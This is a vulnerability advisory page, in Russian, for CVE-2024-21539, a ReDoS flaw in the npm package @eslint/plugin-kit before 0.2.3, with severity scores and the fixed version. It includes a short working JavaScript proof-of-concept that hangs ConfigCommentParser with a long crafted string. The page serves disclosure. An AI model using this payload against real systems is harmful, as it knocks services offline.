GHSA-7q7g-4xm8-89cq

Опубликовано: 15 нояб. 2024

Источник: github

Github: Прошло ревью

CVSS3: 3.5

Описание

Regular Expression Denial of Service (ReDoS) in @eslint/plugin-kit

Crafting a very large and well crafted string can increase the CPU usage and crash the program.

POC

const { ConfigCommentParser } = require("@eslint/plugin-kit"); var str = ""; for (var i = 0; i < 1000000; i++) { str += " "; } str += "A"; console.log("start") var parser = new ConfigCommentParser(); console.log(parser.parseStringConfig(str, "")); console.log("end") // run `npm i @eslint/plugin-kit` and `node attack.js` // then the program will stuck forever with high CPU usage

Ссылки

Пакеты

Наименование

@eslint/plugin-kit

npm

Затронутые версииВерсия исправления

< 0.2.3

0.2.3

EPSS

Процентиль: 44%

0.00213

Низкий

3.5 Low

CVSS3

CVE ID

CVE-2024-21539

Дефекты

CWE-1333

CWE-770

Связанные уязвимости

CVE-2024-21539

CVSS3: 7.5

nvd

около 1 года назад

Versions of the package @eslint/plugin-kit before 0.2.3 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by exploiting this vulnerability.

EPSS

Процентиль: 44%

0.00213

Низкий

3.5 Low

CVSS3

CVE ID

CVE-2024-21539

Дефекты

CWE-1333

CWE-770